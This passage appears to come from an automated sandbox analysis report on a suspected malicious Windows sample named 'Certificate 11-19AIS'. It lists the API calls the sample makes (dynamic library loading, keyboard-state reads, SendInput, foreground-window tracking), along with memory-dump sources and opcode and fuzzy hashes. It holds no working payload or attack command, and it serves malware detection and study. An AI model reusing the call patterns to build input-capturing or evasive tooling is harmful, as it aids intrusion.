                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: msctls_trackbar32
                                                                              • API String ID: 3850602802-1010561917
                                                                              • Opcode ID: 9919c633d7a79f064ce7271929babdf5e03ae4733dac4b87fe028b078b07bdc3
                                                                              • Instruction ID: 654c1bbdf9c134cb92256ebc4cc58b9589fb05300dd9f9d8bdff033ae08a84e3
                                                                              • Opcode Fuzzy Hash: 9919c633d7a79f064ce7271929babdf5e03ae4733dac4b87fe028b078b07bdc3
                                                                              • Instruction Fuzzy Hash: 0811E771200208BEEF245F64CC49FEB376DFF89754F024118FA55E6091D2B6E851C724
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,007D2350,?), ref: 007D22A1
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 007D22A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RoInitialize$combase.dll
                                                                              • API String ID: 2574300362-340411864
                                                                              • Opcode ID: bdd0d4f1d67667da2e5dffb77fefb2e9426be271d4da2ae1c7473543dc58efef
                                                                              • Instruction ID: 3d24d8132d27a99425002a38e307a29ecc0e579c2f316f0099de828c14e2a4b4
                                                                              • Opcode Fuzzy Hash: bdd0d4f1d67667da2e5dffb77fefb2e9426be271d4da2ae1c7473543dc58efef
                                                                              • Instruction Fuzzy Hash: 34E01A70694300EBDB105F70ED8DB197A64B750702F404420F10AE61A8CBF8D091DF65
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007D2276), ref: 007D2376
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 007D237D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 2574300362-2819208100
                                                                              • Opcode ID: 6eef71c45705d5b9ac8f9b30c0629b442cb665e751b268c3250f5ada28457e90
                                                                              • Instruction ID: 37e305bf330457fce9edc124d67b23a8cf8cb5cea5a8f3696758b89c9c39aefe
                                                                              • Opcode Fuzzy Hash: 6eef71c45705d5b9ac8f9b30c0629b442cb665e751b268c3250f5ada28457e90
                                                                              • Instruction Fuzzy Hash: E1E0BD70688300EBDB206F60FE0DB053A68B760702F510824F10DEA2B4CBFD94919E65
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime__swprintf
                                                                              • String ID: %.3d$WIN_XPe
                                                                              • API String ID: 2070861257-2409531811
                                                                              • Opcode ID: d642757dca5c1664d6ad1a80c2ba97b792442777511e0bbdb0634a0a63092fb2
                                                                              • Instruction ID: b7326a33818cdcad5c7f4dc18d7b63e51f3c934a37cb8115bd575f99b97503b5
                                                                              • Opcode Fuzzy Hash: d642757dca5c1664d6ad1a80c2ba97b792442777511e0bbdb0634a0a63092fb2
                                                                              • Instruction Fuzzy Hash: 8DE012B180462CEBCB159750ED05DFA737CFF04745F5004D2F906E1110D6399BD4AA12
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,008121FB,?,008123EF), ref: 00812213
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00812225
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetProcessId$kernel32.dll
                                                                              • API String ID: 2574300362-399901964
                                                                              • Opcode ID: b57204b5b6ac3c09df1689fc3d4d973aedd8eb4027ec9d0db8fcc28afa8ceabd
                                                                              • Instruction ID: 2f7e6b6cc4d4f169f5629c31770911bde77721cac2ae7460fa75e880e6ca066b
                                                                              • Opcode Fuzzy Hash: b57204b5b6ac3c09df1689fc3d4d973aedd8eb4027ec9d0db8fcc28afa8ceabd
                                                                              • Instruction Fuzzy Hash: B2D0A7344007129FC7214F30F808649F6D8FF04304B01882AE866E2250D774D8C08650
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,007B42EC,?,007B42AA,?), ref: 007B4304
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007B4316
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-1355242751
                                                                              • Opcode ID: 2f69f77371584bea5baa04b61ef09711fdd578207a9229d9eb5ba221c0d07a98
                                                                              • Instruction ID: d17fc4f550c97569f18b7d827dbb95dbd74ec495c8c4fbf2b14bfcc604a3da3c
                                                                              • Opcode Fuzzy Hash: 2f69f77371584bea5baa04b61ef09711fdd578207a9229d9eb5ba221c0d07a98
                                                                              • Instruction Fuzzy Hash: 0FD0A730400B129FC7204F20F80D745B6E4FB04301B05882AE451E3261D7B8CC808A50
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,007B41BB,007B4341,?,007B422F,?,007B41BB,?,?,?,?,007B39FE,?,00000001), ref: 007B4359
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007B436B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-3689287502
                                                                              • Opcode ID: 76ff3975dc54a8e6625c999d12b67cda6dd66881057dc9c829960d75dede66c4
                                                                              • Instruction ID: ec37fb10dee086201320be01c518cdc243a9571d260c4e418358b5bd11664837
                                                                              • Opcode Fuzzy Hash: 76ff3975dc54a8e6625c999d12b67cda6dd66881057dc9c829960d75dede66c4
                                                                              • Instruction Fuzzy Hash: 27D0A7304007229FC7204F30F808B45B6D4FB11715B05882AE491E3251D7B8D8808A50
APIs
• LoadLibraryA.KERNEL32(oleaut32.dll,00000000,007F052F,?,007F06D7), ref: 007F0572
• GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 007F0584
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: UnRegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1587604923
• Opcode ID: 6a0271449b93d7719cfdf6daad847d71f8eb48f4ac28ba8a147337c97878aad8
• Instruction ID: 85506e016bee09412dd7c5960e8fddaa33d5c0fbd62bd506aeae0bf3f30ed513
• Opcode Fuzzy Hash: 6a0271449b93d7719cfdf6daad847d71f8eb48f4ac28ba8a147337c97878aad8
• Instruction Fuzzy Hash: C2D05E30400B129BC7205F20F808A16B7E4BB04301B118859E951D2350DAB8C4848AA0
APIs
• LoadLibraryA.KERNEL32(oleaut32.dll,?,007F051D,?,007F05FE), ref: 007F0547
• GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 007F0559
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1071820185
• Opcode ID: 464212b6da2f3750df4b304cfcc9f39c7fc46358e93569e71f990a22af5bf3ea
• Instruction ID: 06724dedb77f2066b73eaec52977c8b486564881297603abd18ee18da7d33074
• Opcode Fuzzy Hash: 464212b6da2f3750df4b304cfcc9f39c7fc46358e93569e71f990a22af5bf3ea
• Instruction Fuzzy Hash: 04D0A734400B12DFC7309F20F808A15B6E4FB00301B11C85DE456D3351DAF8C8808A90
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0080ECBE,?,0080EBBB), ref: 0080ECD6
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0080ECE8
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetSystemWow64DirectoryW$kernel32.dll
• API String ID: 2574300362-1816364905
• Opcode ID: 9e4f0c2fd391880c00646b3281fea6a3f2af6fbbec7051e05fbf493d6a0faa8b
• Instruction ID: 0728ea75914cf85e04b4569d416871598499967be4fb16254b924d30718652b0
• Opcode Fuzzy Hash: 9e4f0c2fd391880c00646b3281fea6a3f2af6fbbec7051e05fbf493d6a0faa8b
• Instruction Fuzzy Hash: 01D0A730411723DFDB305F60FC49607B7E4FB00300B058C2AF855D2291DF74C8808650
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,0080BAD3,00000001,0080B6EE,?,0084DC00), ref: 0080BAEB
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0080BAFD
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
• Opcode ID: 02199a99437acf720cd86a8bf5c90adc31c65b56a5fa48d708b5088db3081384
• Instruction ID: 95fc6522b1b82de9ecf32e463df2d68933fd4f693abbc0cc1d85306da38d7dee
• Opcode Fuzzy Hash: 02199a99437acf720cd86a8bf5c90adc31c65b56a5fa48d708b5088db3081384
• Instruction Fuzzy Hash: F7D0A730810B129FC7705F20FC48B15B7D4FB00310B01882AE853E2290D774C880CA50
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00813BD1,?,00813E06), ref: 00813BE9
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00813BFB
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: 3833f95358e3e9d8f3b4a64b0f77430bb28caa0fa6bc6ba1b22fa84c8162feaf
• Instruction ID: e486fa985e7208a95bbaa438f7513e0e06871360a614e48dd50b8abefcf77584
• Opcode Fuzzy Hash: 3833f95358e3e9d8f3b4a64b0f77430bb28caa0fa6bc6ba1b22fa84c8162feaf
• Instruction Fuzzy Hash: 95D0C7745007529FD7205F65F80864BFAF8FF55715B119819E456F2250D6B4D4C08F90
Similarity
• Opcode ID: f8f6f5d89076fb9398dbf4fbf5bf601f04e684f52ebf70068bdf2cb5278214c0
• Instruction ID: 6c92323fb19a491bd61289bc1ad5680799aa7e0cd8fb2de98e177312afbf40d4
• Opcode Fuzzy Hash: f8f6f5d89076fb9398dbf4fbf5bf601f04e684f52ebf70068bdf2cb5278214c0
• Instruction Fuzzy Hash: 94C1A172A01259EFCB14DFA5C884EAEB7B4FF48700F104598EA05EB251D734EE41DBA0
APIs
• CoInitialize.OLE32(00000000), ref: 0080AAB4
• CoUninitialize.OLE32 ref: 0080AABF
  • Part of subcall function 007F0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007F027B
• VariantInit.OLEAUT32(?), ref: 0080AACA
• VariantClear.OLEAUT32(?), ref: 0080AD9D
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• API String ID: 780911581-0
• Opcode ID: e54fa2b9ffa56d1337d54b0f7c974cc66faeeed06ce399efa681a6261da00c9e
• Instruction ID: 324939fb4bd9af22c5fcb9f455f13cc72b0298132ae3626b9a7179ccb059abe6
• Opcode Fuzzy Hash: e54fa2b9ffa56d1337d54b0f7c974cc66faeeed06ce399efa681a6261da00c9e
• Instruction Fuzzy Hash: F4A134352047019FDB54EF14C895B6AB7E5FF89720F158849FA969B3A2CB34ED00CB86
Similarity
• API ID: Variant$AllocClearCopyInitString
• API String ID: 2808897238-0
• Opcode ID: 08f21d8a0f61ae2fe7d91b5c1507f09e44d372997e381b66339b2cb6b3df716c
• Instruction ID: 8fa1abeb5baf5d5cfd4ff2aee95e9822b077bf453161c3b0b18a8a0560fa0002
• Opcode Fuzzy Hash: 08f21d8a0f61ae2fe7d91b5c1507f09e44d372997e381b66339b2cb6b3df716c
• Instruction Fuzzy Hash: 7E519232601386EBDB249F67D495B6EB3E5AF4D310F20881FE756CB2D1EB7898408705
Similarity
• API ID: _memset$__filbuf__getptd_noexit_memcpy_s
• API String ID: 3877424927-0
• Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
• Instruction ID: f08e3506fee7f4878a3382b836ace49c4e830b6900ef7e97cbf7cd1b9b7ecd16
• Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
• Instruction Fuzzy Hash: 5051A1B0A00605EBDB249FA9888566E7BB5AF40330F24872BF835963D0D779DF50DB52
APIs
• GetWindowRect.USER32(00D066D8,?), ref: 0081C544
• ScreenToClient.USER32(?,00000002), ref: 0081C574
• MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0081C5DA
Similarity
• API ID: Window$ClientMoveRectScreen
• API String ID: 3880355969-0
• Opcode ID: 54513ef5dc11e73c22dd0484e247184cdaa7e7105d2aa8cf99e0c11767a47b23
• Instruction ID: 0036ccf572d5d192cb9a4cb3b8ac53204bcbec010f25154f48d9031956db8cd6
• Opcode Fuzzy Hash: 54513ef5dc11e73c22dd0484e247184cdaa7e7105d2aa8cf99e0c11767a47b23
• Instruction Fuzzy Hash: 98511B75900204AFCF10DF68D885AEE77AAFF65720F108659F969DB291D730E981CB90
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007EC462
• __itow.LIBCMT ref: 007EC49C
  • Part of subcall function 007EC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007EC753
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 007EC505
• __itow.LIBCMT ref: 007EC55A
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow
                                                                              • String ID:
                                                                              • API String ID: 3379773720-0
                                                                              • Opcode ID: b45460fc54ff5e456c8632775ed76c7a432036256bdee54eb738498a15e64829
                                                                              • Instruction ID: b21b84a051b72fd894be590c48b917114cf43ce00014b44c5d95044d73ab7098
                                                                              • Opcode Fuzzy Hash: b45460fc54ff5e456c8632775ed76c7a432036256bdee54eb738498a15e64829
                                                                              • Instruction Fuzzy Hash: E241F975600748EFDF12EF54C85ABEE7BB5AF49700F000059F905A7281DB789A56CB91
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007F3966
• SetKeyboardState.USER32(00000080,?,00000001), ref: 007F3982
• PostMessageW.USER32(00000000,00000102,?,00000001), ref: 007F39EF
• SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 007F3A4D
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: ea96fe7536fde94b6705c9228ed511ded6f8da53c739fb0af3d8f1a7610c492b
• Instruction ID: 499cf6e5bf8cd460d09dd8e488ece85c8210b0f88656a1e8f2001b36c170bab2
• Opcode Fuzzy Hash: ea96fe7536fde94b6705c9228ed511ded6f8da53c739fb0af3d8f1a7610c492b
• Instruction Fuzzy Hash: 52412570A0424CAAEF20CB65880ABFDBBB9AB55324F04415AF6C1963C1C7FC9E85D761
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0081B5D1
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 1e9a6287057e8943a38f8bb333cbdb5e4f3fe3a3e326ae4f4e78db609aa2462b
• Instruction ID: 722a1fa871499eebda8bb5ef57d8b18b748eaaa05bbc1da62eae14ccfa6b6662
• Opcode Fuzzy Hash: 1e9a6287057e8943a38f8bb333cbdb5e4f3fe3a3e326ae4f4e78db609aa2462b
• Instruction Fuzzy Hash: 1B31BA74601208AFEF209F58CC89FE8376EFF65354F644515FA12D62E1D730E9C08A91
APIs
• ClientToScreen.USER32(?,?), ref: 0081D807
• GetWindowRect.USER32(?,?), ref: 0081D87D
• PtInRect.USER32(?,?,0081ED5A), ref: 0081D88D
• MessageBeep.USER32(00000000), ref: 0081D8FE
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: 39ee8190699bdd0dd083f8c73ad9988e07e71c58cde1cca3da997bdaf6c3776f
• Instruction ID: 803a68e585decc6309124ad5e89dffd2908af8a6453b5e28819505db0336cdd4
• Opcode Fuzzy Hash: 39ee8190699bdd0dd083f8c73ad9988e07e71c58cde1cca3da997bdaf6c3776f
• Instruction Fuzzy Hash: 95414570A00219DFCF11DF58D888BA97BB9FF58315F1889A9E818DB264D730E981CB40
APIs
• GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 007F3AB8
• SetKeyboardState.USER32(00000080,?,00008000), ref: 007F3AD4
• PostMessageW.USER32(00000000,00000101,00000000,?), ref: 007F3B34
• SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 007F3B92
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 5a1468dc5bb990f659d9ef36298a08ccf43a401227987750222a4e3f703e7657
• Instruction ID: c4c216d056ef4a9f4b420b7c1b8badd9872fb7c62dbccc4c4b7b88a8053c9903
• Opcode Fuzzy Hash: 5a1468dc5bb990f659d9ef36298a08ccf43a401227987750222a4e3f703e7657
• Instruction Fuzzy Hash: F03124B1A0035CEEEF218B64882DBFE7BA9AB55310F04015AE681973D2C77C8F45D761
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007E4038
• __isleadbyte_l.LIBCMT ref: 007E4066
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007E4094
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007E40CA
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: cc98e91f5243145c05407a1455344b75c9e0a146a43df400c32564bbe58e34a2
• Instruction ID: eb26d05fbd5f64670e0fb84611d1f9d12d19139a4e05dc3fe1cb0d118375241e
• Opcode Fuzzy Hash: cc98e91f5243145c05407a1455344b75c9e0a146a43df400c32564bbe58e34a2
• Instruction Fuzzy Hash: 6131E431601286EFDF219F36C844B7A7BB5FF48310F1544B9E6658B191E739D890D790
APIs
• GetForegroundWindow.USER32 ref: 00817CB9
  • Part of subcall function 007F5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 007F5F6F
  • Part of subcall function 007F5F55: GetCurrentThreadId.KERNEL32 ref: 007F5F76
  • Part of subcall function 007F5F55: AttachThreadInput.USER32(00000000,?,007F781F), ref: 007F5F7D
• GetCaretPos.USER32(?), ref: 00817CCA
• ClientToScreen.USER32(00000000,?), ref: 00817D03
• GetForegroundWindow.USER32 ref: 00817D09
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: 10f9c4033e3febf87ddc939d4360848cb1171c652daa72261ea4c49ff30d090c
• Instruction ID: ebb4062f468388f64fd2a67885ba884a97615b3f9f728fb543168b2998eb56fc
• Opcode Fuzzy Hash: 10f9c4033e3febf87ddc939d4360848cb1171c652daa72261ea4c49ff30d090c
• Instruction Fuzzy Hash: 6A312F72900108AFDB10EFA9DC45DEFFBFDEF98314B10846AE915E7211DA359E458BA0
APIs
  • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
• GetCursorPos.USER32(?), ref: 0081F211
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0082E4C0,?,?,?,?,?), ref: 0081F226
• GetCursorPos.USER32(?), ref: 0081F270
